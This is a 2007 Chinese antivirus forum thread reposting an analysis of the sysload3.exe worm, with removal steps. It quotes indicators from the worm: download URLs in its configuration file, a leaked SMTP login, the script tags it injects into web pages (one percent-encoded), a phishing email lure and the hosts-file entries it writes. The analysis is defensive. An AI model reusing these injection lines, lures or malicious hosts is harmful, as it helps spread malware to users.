瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【转贴】关于恶性蠕虫sysload3.exe的分析

1   1  /  1  页   跳转

【转贴】关于恶性蠕虫sysload3.exe的分析

收藏
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2007-04-01 00:53 | 显示全部 短消息 资料
字号: 1楼

【转贴】关于恶性蠕虫sysload3.exe的分析

最近Windows动态图标文件处理0day漏洞闹的很欢 这不利用该漏洞的蠕虫也出现了 今天在论坛里也发现了一部分人中了这个病毒
在金山毒霸网站上看到了关于这个病毒的分析 特转发过来 望中此病毒的人参考
这是一个Win32平台下的感染型病毒,感染本地磁盘中的.exe文件,并连接网络下载其他病毒。

1、释放病毒文件到如下路径:
%SYSTEM%\sysload3.exe

2、修改注册表,添加如下键值:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="C:\WINDOWS\system32\sysload3.exe"

尝试删除如下键值
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe

3、起IE进程,注入病毒代码,连接网络下载病毒配置文件
配置文件:http://a.2007**.com/css.css,内容如下
[config]
Version=1.0.6
NUM=7
1=http://a.2007ip.com/cald/01.gif
2=http://a.2007ip.com/cald/02.gif
3=http://a.2007ip.com/cald/03.gif
4=http://a.2007ip.com/cald/04.gif
5=http://a.2007ip.com/cald/05.gif
6=http://a.2007ip.com/cald/06.gif
7=http://a.2007ip.com/cald/07.gif
hos=http://if.iloveck.com/test/hos.rar
UpdateMe=http://a.2007ip.com/css.exe
tongji=http://if.iloveck.com/test/tongji.htm
HomePage=http://www.5yip.com/?cj
MAIL_USER=i_love_cq
MAIL_PASS=654321
SMTP_SERVER=smtp.sohu.com

4、读取配置文件下载病毒。

5、读取配置文件,当发现病毒新版本时,下载更新。

6、启NOTEPAD进程,便利本地磁盘,感染大小在10K---10M之间的.exe文件,感染后图标不变,使病毒难以被察觉。
7、感染HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:
<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>


8、发送邮件:
From: i_love_cq@sohu.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm
(7,8项引自C.I.S.R.T,金山网站里没有这项)

9、修改host文件,屏蔽如下网站:

127.0.0.1 localhost
127.0.0.1 mmm.caifu18.net
127.0.0.1 www.18dmm.com
127.0.0.1 d.qbbd.com
127.0.0.1 www.5117music.com
127.0.0.1 www.union123.com
127.0.0.1 www.wu7x.cn
127.0.0.1 www.54699.com
127.0.0.1 60.169.0.66
127.0.0.1 60.169.1.29
127.0.0.1 www.97725.com
127.0.0.1 down.97725.com
127.0.0.1 ip.315hack.com
127.0.0.1 ip.54liumang.com
127.0.0.1 www.41ip.com
127.0.0.1 xulao.com
127.0.0.1 www.heixiou.com
127.0.0.1 www.9cyy.com
127.0.0.1 www.hunll.com
127.0.0.1 www.down.hunll.com
127.0.0.1 do.77276.com
127.0.0.1 www.baidulink.com
127.0.0.1 adnx.yygou.cn
127.0.0.1 222.73.220.45
127.0.0.1 www.f5game.com
127.0.0.1 www.guazhan.cn
127.0.0.1 wm,103715.com
127.0.0.1 www.my6688.cn
127.0.0.1 i.96981.com
127.0.0.1 d.77276.com
127.0.0.1 www1.cw988.cn
127.0.0.1 cool.47555.com
127.0.0.1 www.asdwc.com
127.0.0.1 55880.cn

10、检测软驱,若存在则复制病毒文件到其中文件名为tool.exe,并生成autorun.inf文件,使病毒可以自动运行,以传播自身。

暂时解决办法如下
sreng 删除启动项目"System Boot Check"="C:\WINDOWS\system32\sysload3.exe"
删除病毒主文件C:\WINDOWS\system32\sysload3.exe
恢复hosts文件
清空IE缓存 及系统临时文件夹

至于感染的exe文件 和其他文件暂时无法手动恢复 请等待杀毒软件更新后全盘查杀
最后编辑2007-04-01 15:01:04
分享到:
gototop
 
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2007-04-01 14:35 | 显示全部 短消息 资料
字号: 2楼

瑞星已经在4.1号的紧急升级中解决了此病毒
http://it.rising.com.cn/Channels/Info/Virus/2007-04-01/1175401155d41294.shtml
请中此病毒的人全盘杀毒  以清除被感染的文件
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT